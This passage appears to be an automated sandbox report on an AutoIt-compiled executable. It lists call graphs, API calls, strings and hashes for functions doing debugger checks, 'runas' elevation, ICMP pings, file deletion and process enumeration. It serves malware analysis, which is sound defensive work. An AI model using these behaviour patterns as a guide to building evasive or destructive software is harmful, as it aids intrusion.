100786->100794 100788 abe6a0 100789 aa0fe6 59 API calls Mailbox 100789->100799 100790->100756 100790->100770 100790->100782 100791 abe2e9 VariantClear 100790->100791 100808 afe60c 130 API calls 100790->100808 100812 af5e1d 100790->100812 100837 afebba 100790->100837 100843 a8cfd7 100790->100843 100862 afec68 100790->100862 100870 a85190 59 API calls Mailbox 100790->100870 100877 ad7aad 59 API calls 100790->100877 100791->100790 100792 abea9a 100798 a91c9c 59 API calls 100792->100798 100794->100782 100795 a91c9c 59 API calls 100795->100799 100796 a91207 59 API calls 100796->100799 100797 a87e50 277 API calls 100797->100799 100798->100782 100799->100780 100799->100782 100799->100784 100799->100785 100799->100786 100799->100789 100799->100792 100799->100795 100799->100796 100799->100797 100800 abeb67 100799->100800 100801 ad7aad 59 API calls 100799->100801 100803 aa2f70 67 API calls __cinit 100799->100803 100804 abef28 100799->100804 100806 a85a1a 100799->100806 100800->100782 100879 ad7aad 59 API calls 100800->100879 100801->100799 100803->100799 100880 aea48d 89 API calls 4 library calls 100804->100880 100885 aea48d 89 API calls 4 library calls 100806->100885 100808->100790 100813 af5e46 100812->100813 100814 af5e74 WSAStartup 100813->100814 100900 a8502b 59 API calls 100813->100900 100816 af5e9d 100814->100816 100836 af5e88 Mailbox 100814->100836 100887 a940cd 100816->100887 100817 af5e61 100817->100814 100901 a8502b 59 API calls 100817->100901 100821 a84d37 84 API calls 100823 af5eb2 100821->100823 100822 af5e70 100822->100814 100892 a9402a WideCharToMultiByte 100823->100892 100825 af5ebf inet_addr gethostbyname 100826 af5edd IcmpCreateFile 100825->100826 100825->100836 100827 af5f01 100826->100827 100826->100836 100828 aa0fe6 Mailbox 59 API calls 100827->100828 100829 af5f1a 100828->100829 100830 a9433f 59 API calls 100829->100830 100831 af5f25 100830->100831 100832 af5f55 IcmpSendEcho 100831->100832 100833 af5f34 IcmpSendEcho 100831->100833 100835 af5f6d 100832->100835 100833->100835 100834 af5fd4 IcmpCloseHandle WSACleanup 100834->100836 100835->100834 100836->100790 100841 afebcd 100837->100841 100838 a84d37 84 API calls 100839 afec0a 100838->100839 100904 ae7ce4 100839->100904 100841->100838 100842 afebdc 100841->100842 100842->100790 100844 a84d37 84 API calls 100843->100844 100845 a8d001 100844->100845 100846 a85278 59 API calls 100845->100846 100847 a8d018 100846->100847 100848 a8d57b 100847->100848 100858 a8d439 Mailbox __NMSG_WRITE 100847->100858 100945 a8502b 59 API calls 100847->100945 100848->100790 100850 aa312d _W_store_winword 60 API calls 100850->100858 100851 a9162d 59 API calls 100851->100858 100852 aa0c65 62 API calls 100852->100858 100854 a84f98 59 API calls 100854->100858 100856 a8502b 59 API calls 100856->100858 100857 a84d37 84 API calls 100857->100858 100858->100848 100858->100850 100858->100851 100858->100852 100858->100854 100858->100856 100858->100857 100859 a91821 59 API calls 100858->100859 100860 a959d3 94 API calls 100858->100860 100861 a95ac3 Shell_NotifyIconW 100858->100861 100946 a9153b 59 API calls 2 library calls 100858->100946 100947 a84f3c 59 API calls Mailbox 100858->100947 100859->100858 100860->100858 100861->100858 100863 afecab 100862->100863 100864 afec84 100862->100864 100865 afeccd 100863->100865 100951 a8502b 59 API calls 100863->100951 100864->100790 100865->100864 100868 afed11 100865->100868 100952 a8502b 59 API calls 100865->100952 100948 ae67fc 100868->100948 100870->100790 100871->100770 100872->100763 100873->100776 100874->100778 100875->100769 100876->100769 100877->100790 100878->100788 100879->100782 100880->100806 100881->100756 100882->100782 100883->100756 100884->100756 100885->100782 100886->100782 100888 aa0fe6 Mailbox 59 API calls 100887->100888 100889 a940e0 100888->100889 100890 a91c7e 59 API calls 100889->100890 100891 a940ed 100890->100891 100891->100821 100893 a9404e 100892->100893 100894 a94085 100892->100894 100895 aa0fe6 Mailbox 59 API calls 100893->100895 100903 a93f20 59 API calls Mailbox 100894->100903 100897 a94055 WideCharToMultiByte 100895->100897 100902 a93f79 59 API calls 2 library calls 100897->100902 100899 a94077 100899->100825 100900->100817 100901->100822 100902->100899 100903->100899 100905 ae7cf1 100904->100905 100906 aa0fe6 Mailbox 59 API calls 100905->100906 100907 ae7cf8 100906->100907 100910 ae6135 100907->100910 100909 ae7d3b Mailbox 100909->100842 100911 a91aa4 59 API calls 100910->100911 100912 ae6148 CharLowerBuffW 100911->100912 100915 ae615b 100912->100915 100913 a91609 59 API calls 100913->100915 100914 ae6165 _memset Mailbox 100914->100909 100915->100913 100915->100914 100916 ae6195 100915->100916 100917 ae61a7 100916->100917 100918 a91609 59 API calls 100916->100918 100919 aa0fe6 Mailbox 59 API calls 100917->100919 100918->100917 100920 ae61d5 100919->100920 100921 ae61f4 100920->100921 100943 ae6071 59 API calls 100920->100943 100928 ae6292 100921->100928 100924 ae6233 100924->100914 100925 aa0fe6 Mailbox 59 API calls 100924->100925 100926 ae624d 100925->100926 100927 aa0fe6 Mailbox 59 API calls 100926->100927 100927->100914 100929 a91207 59 API calls 100928->100929 100930 ae62c4 100929->100930 100931 a91207 59 API calls 100930->100931 100932 ae62cd 100931->100932 100933 a91207 59 API calls 100932->100933 100940 ae62d6 _wcscmp 100933->100940 100934 a91821 59 API calls 100934->100940 100935 aa3836 GetStringTypeW 100935->100940 100936 a9153b 59 API calls 100936->100940 100938 ae6292 60 API calls 100938->100940 100939 aa37ba 59 API calls 100939->100940 100940->100934 100940->100935 100940->100936 100940->100938 100940->100939 100941 ae65ab Mailbox 100940->100941 100942 a91c9c 59 API calls 100940->100942 100944 aa385c GetStringTypeW _iswctype 100940->100944 100941->100924 100942->100940 100943->100920 100944->100940 100945->100858 100946->100858 100947->100858 100949 ae6818 92 API calls 100948->100949 100950 ae6813 100949->100950 100950->100864 100951->100865 100952->100868 100953 a81016 100958 a95ce7 100953->100958 100956 aa2f70 __cinit 67 API calls 100957 a81025 100956->100957 100959 aa0fe6 Mailbox 59 API calls 100958->100959 100960 a95cef 100959->100960 100961 a8101b 100960->100961 100965 a95f39 100960->100965 100961->100956 100966 a95f42 100965->100966 100967 a95cfb 100965->100967 100968 aa2f70 __cinit 67 API calls 100966->100968 100969 a95d13 100967->100969 100968->100967 100970 a91207 59 API calls 100969->100970 100971 a95d2b GetVersionExW 100970->100971 100972 a91821 59 API calls 100971->100972 100973 a95d6e 100972->100973 100974 a91981 59 API calls 100973->100974 100982 a95d9b 100973->100982 100975 a95d8f 100974->100975 100976 a9133d 59 API calls 100975->100976 100976->100982 100977 a95e00 GetCurrentProcess IsWow64Process 100978 a95e19 100977->100978 100980 a95e98 GetSystemInfo 100978->100980 100981 a95e2f 100978->100981 100979 ad1098 100983 a95e65 100980->100983 100993 a955f0 100981->100993 100982->100977 100982->100979 100983->100961 100986 a95e8c GetSystemInfo 100989 a95e56 100986->100989 100987 a95e41 100988 a955f0 2 API calls 100987->100988 100990 a95e49 GetNativeSystemInfo 100988->100990 100989->100983 100991 a95e5c FreeLibrary 100989->100991 100990->100989 100991->100983 100994 a95619 100993->100994 100995 a955f9 LoadLibraryA 100993->100995 100994->100986 100994->100987 100995->100994 100996 a9560a GetProcAddress 100995->100996 100996->100994 100997 abdcb4 100998 aa0fe6 Mailbox 59 API calls 100997->100998 100999 abdcbb 100998->100999 101000 a84e77 100999->101000 101002 ae5f90 100999->101002 101003 ae5fb3 101002->101003 101004 ae6066 101003->101004 101005 aa0fe6 Mailbox 59 API calls 101003->101005 101004->101000 101008 ae5fef 101005->101008 101007 ae600e 101007->101004 101009 a91c9c 59 API calls 101007->101009 101008->101007 101010 ae6071 59 API calls 101008->101010 101009->101007 101010->101008 101011 a87357 101012 a878f5 101011->101012 101013 a87360 101011->101013 101021 a86fdb Mailbox 101012->101021 101028 ad87f9 59 API calls _memmove 101012->101028 101013->101012 101014 a84d37 84 API calls 101013->101014 101015 a8738b 101014->101015 101015->101012 101017 a8739b 101015->101017 101022 a91680 101017->101022 101018 abf91b 101020 a91c9c 59 API calls 101018->101020 101020->101021 101023 a91692 101022->101023 101026 a916ba _memmove 101022->101026 101024 aa0fe6 Mailbox 59 API calls 101023->101024 101023->101026 101025 a9176f _memmove 101024->101025 101027 aa0fe6 Mailbox 59 API calls 101025->101027 101026->101021 101027->101025 101028->101018

                                                                                  Executed Functions

                                                                                  Function 00A95240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A9526C
                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00A9527E
                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00A952E6
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                    • Part of subcall function 00A8BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00A8BC07
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A95366
                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse user this program.,AutoIt,00000010), ref: 00AD0B2E
                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00AD0B66
                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B36D10), ref: 00AD0BE9
                                                                                  • ShellExecuteW.SHELL32(00000000), ref: 00AD0BF0
                                                                                    • Part of subcall function 00A9514C: GetSysColorBrush.USER32(0000000F), ref: 00A95156
                                                                                    • Part of subcall function 00A9514C: LoadCursorW.USER32(00000000,00007F00), ref: 00A95165
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(00000063), ref: 00A9517C
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(000000A4), ref: 00A9518E
                                                                                    • Part of subcall function 00A9514C: LoadIconW.USER32(000000A2), ref: 00A951A0
                                                                                    • Part of subcall function 00A9514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00A951C6
                                                                                    • Part of subcall function 00A9514C: RegisterClassExW.USER32(?), ref: 00A9521C
                                                                                    • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A95109
                                                                                    • Part of subcall function 00A950DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A9512A
                                                                                    • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A9513E
                                                                                    • Part of subcall function 00A950DB: ShowWindow.USER32(00000000), ref: 00A95147
                                                                                    • Part of subcall function 00A959D3: _memset.LIBCMT ref: 00A959F9
                                                                                    • Part of subcall function 00A959D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A95A9E
                                                                                  Strings
                                                                                  • AutoIt, xrefs: 00AD0B23
                                                                                  • runas, xrefs: 00AD0BE4
                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse user this program., xrefs: 00AD0B28
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse user this program.$runas
                                                                                  • API String ID: 529118366-2030392706
                                                                                  • Opcode ID: 6271ab9402db1d0c2abd97dd6780ce0c8f496785cb18e4d0bea2949c193eee9a
                                                                                  • Instruction ID: e8e6f5b6e9fb942f630f8181ddf3142afaa8d697d5abbd515deda216aa4494b1
                                                                                  • Opcode Fuzzy Hash: 6271ab9402db1d0c2abd97dd6780ce0c8f496785cb18e4d0bea2949c193eee9a
                                                                                  • Instruction Fuzzy Hash: 3151D331F48249AACF12BBB0DD56EEE7BF8AB06340F1041A5F451672A2DFF04A45DB61
                                                                                  Function 00A95D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetVersionExW.KERNEL32(?), ref: 00A95D40
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • GetCurrentProcess.KERNEL32(?,00B10A18,00000000,00000000,?), ref: 00A95E07
                                                                                  • IsWow64Process.KERNEL32(00000000), ref: 00A95E0E
                                                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00A95E54
                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 00A95E5F
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00A95E90
                                                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00A95E9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 1986165174-0
                                                                                  • Opcode ID: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                                                  • Instruction ID: 3c24dc03dd3468ec0d0f384a6a8e13fea7210a64abde9ecfb2912f123df70c0d
                                                                                  • Opcode Fuzzy Hash: 74f677873b4f88830c9341a24a55d1da4bfdf0c28275d86a76e4384fb324f96b
                                                                                  • Instruction Fuzzy Hash: 0591F531A4DBC0DECB32DB7884515AAFFF56F2A300B884A5ED0C793B01D631AA48C759
                                                                                  Function 00AE4005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00AA0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A92A58,?,00008000), ref: 00AA02A4
                                                                                    • Part of subcall function 00AE4FEC: GetFileAttributesW.KERNEL32(?,00AE3BFE), ref: 00AE4FED
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE407C
                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00AE40CC
                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AE40DD
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE40F4
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE40FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                  • String ID: \*.*
                                                                                  • API String ID: 2649000838-1173974218
                                                                                  • Opcode ID: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                                                  • Instruction ID: 888f0342082a9c605c41eec3fd1db383906d8d2ddbb4bd2acbfcb1fd27db5c68
                                                                                  • Opcode Fuzzy Hash: 90c511c713a70832f4a5b14ea93fdac5765d99c368986db313b4cc607832e060
                                                                                  • Instruction Fuzzy Hash: 3F316B311183869BC601FF60C9958EFB7ECBE95304F444A2DF5E183191EB349A09CBA2
                                                                                  Function 00AE4148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00AE416D
                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00AE417B
                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00AE419B
                                                                                  • FindCloseChangeNotification.KERNEL32(00000000), ref: 00AE4245
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3243318325-0
                                                                                  • Opcode ID: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                                                  • Instruction ID: 809da9100080e913a2fea625fcfaa4f535d82724a54a2637d66787943de75e64
                                                                                  • Opcode Fuzzy Hash: a6c4572d20236872cc9c0d313972dc3c6728003f85d3c35edf2e5b684d458bef
                                                                                  • Instruction Fuzzy Hash: 5C3181712083429FD700EF55D885AEFBBF8AF99350F40092DF585C31A1EB719A49CB52
                                                                                  Function 00A8B020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A93740: CharUpperBuffW.USER32(?,00B471DC,00000000,?,00000000,00B471DC,?,00A853A5,?,?,?,?), ref: 00A9375D
                                                                                  • _memmove.LIBCMT ref: 00A8B68A
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharUpper_memmove
                                                                                  • String ID:
                                                                                  • API String ID: 2819905725-0
                                                                                  • Opcode ID: 5c9484ee4bacfaac9a26a49a898b1eb9b2da302c9cb17c393ace3cf304a8d856
                                                                                  • Instruction ID: 9c3aa79ecc67209427fff7130a390d0fe83b3e4967153dba67dd5366c1451fd1
                                                                                  • Opcode Fuzzy Hash: 5c9484ee4bacfaac9a26a49a898b1eb9b2da302c9cb17c393ace3cf304a8d856
                                                                                  • Instruction Fuzzy Hash: C4A278716183419FCB24EF18C580B2AB7F1BF89304F15896DE89A8B361D771ED45CBA2
                                                                                  Function 00AE494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNEL32(?,00ACFC86), ref: 00AE495A
                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00AE496B
                                                                                  • FindClose.KERNEL32(00000000), ref: 00AE497B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$AttributesCloseFirst
                                                                                  • String ID:
                                                                                  • API String ID: 48322524-0
                                                                                  • Opcode ID: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                                                  • Instruction ID: a693949508d0b37af7e21b2ba180a89f261ffeabda5eb766d2e105a75b88cb90
                                                                                  • Opcode Fuzzy Hash: 4f563899515d1870f5f126080455320547aaed77223aed4752adcb03144b08f9
                                                                                  • Instruction Fuzzy Hash: 0EE0DF31820515AB82107B38EC0D8EA775C9E0A339F904705F835E20E0EBB49D9886D6
                                                                                  Function 00A894E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                                                                  Download Yara Rule
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: afd4427d210475e560e8d25c46e83f5787f0f408e558fceac2c21786f085f405
                                                                                  • Instruction ID: 2ebb767ceeb2b24ec00bc17f2786968d34e47810da72785bc6a26556a21aa6db
                                                                                  • Opcode Fuzzy Hash: afd4427d210475e560e8d25c46e83f5787f0f408e558fceac2c21786f085f405
                                                                                  • Instruction Fuzzy Hash: 0A229C74A00206DFDB24EF58C580BBFB7B0FF49310F198169E856AB391E770A985CB91
                                                                                  Function 00A8BC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • timeGetTime.WINMM ref: 00A8BF57
                                                                                    • Part of subcall function 00A852B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A852E6
                                                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00AC36B5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessagePeekSleepTimetime
                                                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                                                  • API String ID: 1792118007-922114024
                                                                                  • Opcode ID: bd6623cd916ce46059f2b018f9bdf3da06a07605928ff7f672ff051bc89bc7e2
                                                                                  • Instruction ID: f6abc6d02c5188ce4f908a7d73fb938129d56c3c9d234e36d4205bf2658780ad
                                                                                  • Opcode Fuzzy Hash: bd6623cd916ce46059f2b018f9bdf3da06a07605928ff7f672ff051bc89bc7e2
                                                                                  • Instruction Fuzzy Hash: 88C2AF716083419FDB24EF24C994FAEB7E0BF84304F15891DF58A9B2A1DB71E944CB92
                                                                                  Function 00A833E8 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 67windowregistryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                  • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                  • API String ID: 2914291525-1005189915
                                                                                  • Opcode ID: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
                                                                                  • Instruction ID: 8e4b1e057d8be9c1f91c6e1ef2bb08db1687b09a40301c4b7b53b1e93747e3da
                                                                                  • Opcode Fuzzy Hash: dcdd6345a9fc27619fe2e0548fe947f508f21a87138cfe44297933ca715a6fab
                                                                                  • Instruction Fuzzy Hash: 013116B5954309EFDB40DFA4D889BC9BBF4FB09310F50815AF590A72A0EBB50681CF90
                                                                                  Function 00A83411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00A83444
                                                                                  • RegisterClassExW.USER32(00000030), ref: 00A8346E
                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00A8347F
                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00A8349C
                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00A834AC
                                                                                  • LoadIconW.USER32(000000A9), ref: 00A834C2
                                                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00A834D1
                                                                                  Strings
